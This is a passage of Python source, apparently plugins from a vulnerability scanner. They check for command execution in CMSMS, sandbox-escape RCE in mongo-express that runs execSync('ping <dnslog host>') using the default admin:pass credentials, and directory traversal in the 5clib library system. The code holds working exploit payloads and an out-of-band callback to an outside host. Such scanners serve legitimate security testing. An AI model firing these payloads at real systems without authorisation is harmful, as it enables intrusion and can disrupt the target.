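            # from `data`, and a fixed number silently goes stale the moment the
            # body is edited.
            "Connection": "close",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        }
        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        if con.find('''{"response":"Success","details":"}''') != -1:
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # record the hit for this url
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # result file is named after the target url
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log target url and plugin name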
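def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe ``Url`` for mongo-express ``/checkValid`` remote code execution.

    Args:
        Url: Target; UrlProcessing splits it into scheme, host and port.
        RandomAgent: User-Agent string to send.
        UnixTimestamp: Scan timestamp handed to VulnerabilityDetails.

    Out-of-band check: the posted ``document`` escapes the sandbox and runs
    ``ping <dnslog host>`` on the target; a DNS callback seen by Dnslog within
    the 10 s wait is the hit, recorded via VulnerabilityDetails and WriteFile.
    The request authenticates with ``Basic YWRtaW46cGFzcw==`` (``admin:pass``,
    the mongo-express default), so only default-credential instances are
    covered. Failures go to ErrorHandling/ErrorLog. Returns None.

    WARNING: this executes a command on the target. On Linux ``ping`` without a
    count flag does not exit, so ``execSync`` can block the target's Node
    process indefinitely; a bounded command (``ping -c 1`` / ``nslookup``)
    would be gentler -- the payload is left unchanged here.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/checkValid"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        dns = Dnslog()
        data = 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping {}")'.format(
            dns.dns_host())

        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Authorization': 'Basic YWRtaW46cGFzcw==',  # admin:pass, mongo-express default
            'Connection': 'close',
            'Content-Type': 'application/x-www-form-urlencoded',
            # Content-Length intentionally omitted: the body length varies with
            # the dnslog hostname and requests sets the header from the body,
            # so a hard-coded 123 cannot be right for every host.
        }
        s = requests.session()
        s.post(payload_url,
               data=data,
               headers=headers,
               timeout=6,
               verify=False)
        time.sleep(10)  # give the target's ping time to resolve the dnslog name
        if dns.result():
            Medusa = "{} 存在mongo-express远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\npayload:{}".format(
                url, payload_url, data)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # record the hit for this url
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  # result file is named after the target url
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Same error routing as the other plugins (Outlier was missing here).
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log target url and plugin name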
def medusa(Url, RandomAgent, Token, proxies=None):
    """Probe ``Url`` for directory traversal in the 5clib (五车) library system.

    Args:
        Url: Target; UrlProcessing splits it into scheme, host and port.
        RandomAgent: User-Agent string to send.
        Token: Scan token handed to VulnerabilityDetails.
        proxies: Proxy spec, normalised via ClassCongregation.Proxies.

    Posts ``subkind=c:/windows`` to ``/5clib/kindaction.action`` and treats a
    200 response mentioning ``system.ini`` as a hit -- a Windows-only probe, so
    a Linux install is never flagged by it. Hits go to VulnerabilityDetails and
    WriteFile; failures to ErrorHandling/ErrorLog. Returns None.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    default_ports = {'https': 443, 'http': 80}
    if port is None:
        port = default_ports.get(scheme)
    try:
        endpoint = "/5clib/kindaction.action"
        body = "filePath=&kind=music&curpage=1&actionName=&subkind=c:/windows&pagesize=20&curPage=1&toPage=1"
        target = scheme + "://" + url + ":" + str(port) + endpoint
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }

        session = requests.session()
        resp = session.post(target,
                            data=body,
                            headers=request_headers,
                            proxies=proxies,
                            timeout=6,
                            verify=False)
        listing = resp.text
        if resp.status_code == 200 and 'system.ini' in listing:
            Medusa = "{}存在五车图书管理系统存在任意文件遍历漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, target, listing)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, Token).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin)
        ClassCongregation.ErrorLog().Write(url, plugin)